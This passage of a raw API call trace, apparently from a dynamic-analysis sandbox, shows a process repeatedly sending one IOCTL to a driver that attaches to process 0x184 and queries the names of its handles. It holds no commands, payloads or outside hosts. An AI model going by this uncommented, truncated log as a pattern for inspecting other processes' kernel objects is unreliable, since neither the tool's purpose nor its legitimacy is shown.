ObfDereferenceObject (Object=0xfffff8a0017c1b00) returned 0x1 [0221.879] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.879] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.879] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.879] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.879] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.879] PsAcquireProcessExitSynchronization () returned 0x0 [0221.879] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.879] ObReferenceObjectByHandle (in: Handle=0x444, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017ec440, HandleInformation=0x0) returned 0x0 [0221.879] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.879] PsReleaseProcessExitSynchronization () returned 0x2 [0221.879] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.880] ObQueryNameString (in: Object=0xfffff8a0017ec440, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.880] ObfDereferenceObject (Object=0xfffff8a0017ec440) returned 0x1 [0221.880] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.880] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.880] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.880] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.880] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.880] PsAcquireProcessExitSynchronization () returned 0x0 [0221.880] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.880] ObReferenceObjectByHandle (in: Handle=0x454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017cb710, HandleInformation=0x0) returned 0x0 [0221.880] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.880] PsReleaseProcessExitSynchronization () returned 0x2 [0221.880] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.880] ObQueryNameString (in: Object=0xfffff8a0017cb710, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.880] ObfDereferenceObject (Object=0xfffff8a0017cb710) returned 0x1 [0221.880] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.880] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.880] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.880] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.880] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.880] PsAcquireProcessExitSynchronization () returned 0x0 [0221.880] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.880] ObReferenceObjectByHandle (in: Handle=0x458, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001864ba0, HandleInformation=0x0) returned 0x0 [0221.880] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.881] PsReleaseProcessExitSynchronization () returned 0x2 [0221.881] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.881] ObQueryNameString (in: Object=0xfffff8a001864ba0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.881] ObfDereferenceObject (Object=0xfffff8a001864ba0) returned 0x1 [0221.881] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.881] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.881] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.881] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.881] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.881] PsAcquireProcessExitSynchronization () returned 0x0 [0221.881] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.881] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0015de660, HandleInformation=0x0) returned 0x0 [0221.881] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.881] PsReleaseProcessExitSynchronization () returned 0x2 [0221.881] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.881] ObQueryNameString (in: Object=0xfffff8a0015de660, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.881] ObfDereferenceObject (Object=0xfffff8a0015de660) returned 0x1 [0221.881] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.881] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.881] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.881] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.881] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.881] PsAcquireProcessExitSynchronization () returned 0x0 [0221.881] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.881] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001875a00, HandleInformation=0x0) returned 0x0 [0221.882] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.882] PsReleaseProcessExitSynchronization () returned 0x2 [0221.882] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.882] ObQueryNameString (in: Object=0xfffff8a001875a00, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.882] ObfDereferenceObject (Object=0xfffff8a001875a00) returned 0x1 [0221.882] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.882] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.882] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.882] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.882] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.882] PsAcquireProcessExitSynchronization () returned 0x0 [0221.882] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.882] ObReferenceObjectByHandle (in: Handle=0x47c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0014f75e0, HandleInformation=0x0) returned 0x0 [0221.882] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.882] PsReleaseProcessExitSynchronization () returned 0x2 [0221.882] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.882] ObQueryNameString (in: Object=0xfffff8a0014f75e0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.882] ObfDereferenceObject (Object=0xfffff8a0014f75e0) returned 0x1 [0221.882] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.882] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.882] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.882] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.882] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.882] PsAcquireProcessExitSynchronization () returned 0x0 [0221.883] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.883] ObReferenceObjectByHandle (in: Handle=0x484, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001876e90, HandleInformation=0x0) returned 0x0 [0221.883] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.883] PsReleaseProcessExitSynchronization () returned 0x2 [0221.883] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.883] ObQueryNameString (in: Object=0xfffff8a001876e90, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.883] ObfDereferenceObject (Object=0xfffff8a001876e90) returned 0x1 [0221.883] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.883] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.883] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.883] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.883] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.883] PsAcquireProcessExitSynchronization () returned 0x0 [0221.883] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.883] ObReferenceObjectByHandle (in: Handle=0x490, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001828a50, HandleInformation=0x0) returned 0x0 [0221.883] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.883] PsReleaseProcessExitSynchronization () returned 0x2 [0221.883] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.883] ObQueryNameString (in: Object=0xfffff8a001828a50, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.883] ObfDereferenceObject (Object=0xfffff8a001828a50) returned 0x1 [0221.883] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.883] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.883] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.883] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.884] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.884] PsAcquireProcessExitSynchronization () returned 0x0 [0221.884] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.884] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001309060, HandleInformation=0x0) returned 0x0 [0221.884] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.884] PsReleaseProcessExitSynchronization () returned 0x2 [0221.884] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.884] ObQueryNameString (in: Object=0xfffff8a001309060, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.884] ObfDereferenceObject (Object=0xfffff8a001309060) returned 0x1 [0221.884] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.884] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.884] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.884] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.884] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.884] PsAcquireProcessExitSynchronization () returned 0x0 [0221.884] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.884] ObReferenceObjectByHandle (in: Handle=0x4b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001885b90, HandleInformation=0x0) returned 0x0 [0221.884] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.884] PsReleaseProcessExitSynchronization () returned 0x2 [0221.884] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.884] ObQueryNameString (in: Object=0xfffff8a001885b90, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.884] ObfDereferenceObject (Object=0xfffff8a001885b90) returned 0x1 [0221.884] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.884] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.885] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.885] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.885] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.885] PsAcquireProcessExitSynchronization () returned 0x0 [0221.885] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.885] ObReferenceObjectByHandle (in: Handle=0x4c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00187c200, HandleInformation=0x0) returned 0x0 [0221.885] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.885] PsReleaseProcessExitSynchronization () returned 0x2 [0221.885] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.885] ObQueryNameString (in: Object=0xfffff8a00187c200, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.885] ObfDereferenceObject (Object=0xfffff8a00187c200) returned 0x1 [0221.885] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.885] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.885] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.885] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.885] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.885] PsAcquireProcessExitSynchronization () returned 0x0 [0221.885] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.885] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001890aa0, HandleInformation=0x0) returned 0x0 [0221.885] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.885] PsReleaseProcessExitSynchronization () returned 0x2 [0221.885] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.885] ObQueryNameString (in: Object=0xfffff8a001890aa0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.885] ObfDereferenceObject (Object=0xfffff8a001890aa0) returned 0x1 [0221.885] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.885] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.886] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.886] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.886] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.886] PsAcquireProcessExitSynchronization () returned 0x0 [0221.886] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.886] ObReferenceObjectByHandle (in: Handle=0x4e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001883230, HandleInformation=0x0) returned 0x0 [0221.886] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.886] PsReleaseProcessExitSynchronization () returned 0x2 [0221.886] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.886] ObQueryNameString (in: Object=0xfffff8a001883230, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.886] ObfDereferenceObject (Object=0xfffff8a001883230) returned 0x1 [0221.886] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.886] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.886] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.886] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.886] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.886] PsAcquireProcessExitSynchronization () returned 0x0 [0221.886] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.886] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00187fb60, HandleInformation=0x0) returned 0x0 [0221.886] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.886] PsReleaseProcessExitSynchronization () returned 0x2 [0221.886] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.886] ObQueryNameString (in: Object=0xfffff8a00187fb60, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.886] ObfDereferenceObject (Object=0xfffff8a00187fb60) returned 0x1 [0221.886] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.887] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.887] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.887] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0221.887] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0221.887] PsAcquireProcessExitSynchronization () returned 0x0 [0221.887] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880052b35d0) [0221.887] ObReferenceObjectByHandle (in: Handle=0x500, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00183fce0, HandleInformation=0x0) returned 0x0 [0221.887] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0221.887] PsReleaseProcessExitSynchronization () returned 0x2 [0221.887] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x184 [0221.887] ObQueryNameString (in: Object=0xfffff8a00183fce0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0221.887] ObfDereferenceObject (Object=0xfffff8a00183fce0) returned 0x1 [0221.887] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0221.887] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc15e0 | out: hHeap=0x320000) returned 1 [0221.887] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc15e0 [0221.887] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, 